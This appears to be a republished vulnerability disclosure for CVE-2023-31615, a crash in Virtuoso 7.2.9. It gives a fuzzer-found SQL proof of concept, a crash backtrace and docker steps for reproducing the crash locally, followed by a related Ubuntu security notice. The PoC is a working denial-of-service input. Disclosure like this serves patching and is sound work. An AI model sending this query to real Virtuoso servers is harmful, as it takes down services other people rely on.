Headline
CVE-2023-31615: virtuoso 7.2.9 crashed at chash_array · Issue #1124 · openlink/virtuoso-opensource
An issue in the chash_array component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE t1(x INTEGER UNIQUE); CREATE TABLE k(v varchar(255), excluded varchar(255)); INSERT INTO t1(x, x, x, x, x, x, x) VALUES(16183,15638,6,0,5,2,0); SELECT 'one’, t1.* FROM t1 LEFT JOIN k ON t1.x=k.v WHERE k.v IS NULL;
backtrace:
#0 0x4257c4 (chash_array+0x834) #1 0x43932f (hash_source_chash_input+0x6df) #2 0x7ac43e (qn_input+0x3ce) #3 0x7ac8a6 (qn_send_output+0x236) #4 0x81e26d (set_ctr_vec_input+0x94d) #5 0x7ac43e (qn_input+0x3ce) #6 0x7acb6f (qn_ts_send_output+0x23f) #7 0x7b247e (table_source_input+0x16ee) #8 0x7ac43e (qn_input+0x3ce) #9 0x7ac8a6 (qn_send_output+0x236) #10 0x44c34e (chash_fill_input+0x13e) #11 0x535d6f (hash_fill_node_input+0xef) #12 0x7ac43e (qn_input+0x3ce) #13 0x7ac8a6 (qn_send_output+0x236) #14 0x81e26d (set_ctr_vec_input+0x94d) #15 0x7ac43e (qn_input+0x3ce) #16 0x7bdc6e (qr_exec+0x11ee) #17 0x7cb446 (sf_sql_execute+0x11a6) #18 0x7cbf4e (sf_sql_execute_w+0x17e) #19 0x7d4c0d (sf_sql_execute_wrapper+0x3d) #20 0xe1f01c (future_wrapper+0x3fc) #21 0xe2691e (_thread_boot+0x11e) #22 0x7fac44860609 (start_thread+0xd9) #23 0x7fac44630133 (clone+0x43)
ways to reproduce (write poc to the file ‘/tmp/test.sql’ first):
remove the old one
docker container rm virtdb_test -f
start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
wait the server starting
sleep 10
check whether the simple query works
echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba
run the poc
docker exec -i virtdb_test isql 1111 dba < “/tmp/test.sql”
Related news
Ubuntu Security Notice 6832-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.